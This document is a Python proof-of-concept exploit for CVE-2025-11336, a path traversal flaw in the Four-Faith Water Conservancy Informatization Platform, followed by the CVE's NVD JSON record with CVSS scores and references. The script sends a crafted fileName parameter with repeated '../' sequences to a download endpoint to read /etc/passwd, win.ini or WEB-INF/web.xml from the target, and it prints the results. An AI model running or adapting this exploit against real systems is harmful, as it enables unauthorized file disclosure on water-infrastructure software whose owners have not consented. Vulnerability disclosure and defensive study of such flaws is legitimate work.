CVE-2025-11336

# CVE-2025-11336 - Four-Faith Water Conservancy Informatization Platform Path Traversal PoC # Vulnerability: Path Traversal via fileName parameter in download endpoint # Affected: Four-Faith Water Conservancy Informatization Platform <= 2.2 import requests TARGET_URL = "http://target-host:8080" VULNERABLE_PATH = "/stAlarmConfigure/index.do/../../aloneReport/download.do;otherlogout.do" def exploit_path_traversal(target_url, traversal_depth=4, target_file="etc/passwd"): """ Exploit path traversal vulnerability to read arbitrary files """ # Construct traversal path traversal = "../" * traversal_depth malicious_filename = f"{traversal}{target_file}" # Build full URL full_url = f"{target_url}{VULNERABLE_PATH}" # Send exploit request params = {"fileName": malicious_filename} headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "*/*" } try: response = requests.get(full_url, params=params, headers=headers, timeout=10) print(f"[*] Target: {target_url}") print(f"[*] Payload: fileName={malicious_filename}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.content)} bytes") print(f"[*] Response Content:\n{response.text[:2000]}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": # Example: Read /etc/passwd on Linux exploit_path_traversal(TARGET_URL, traversal_depth=5, target_file="etc/passwd") # Example: Read Windows system files # exploit_path_traversal(TARGET_URL, traversal_depth=4, target_file="windows/win.ini") # Example: Read application configuration files # exploit_path_traversal(TARGET_URL, traversal_depth=3, target_file="WEB-INF/web.xml")

{"cve": {"id": "CVE-2025-11336", "sourceIdentifier": "[email protected]", "published": "2025-10-06T14:15:42.060", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Four-Faith Water Conservancy Informatization Platform up to 2.2. Affected by this issue is some unknown functionality of the file /stAlarmConfigure/index.do/../../aloneReport/download.do;otherlogout.do. Such manipulation of the argument fileName leads to path traversal. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/rookie1006/CVE/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327219", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327219", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.664612", "source": "[email protected]"}]}}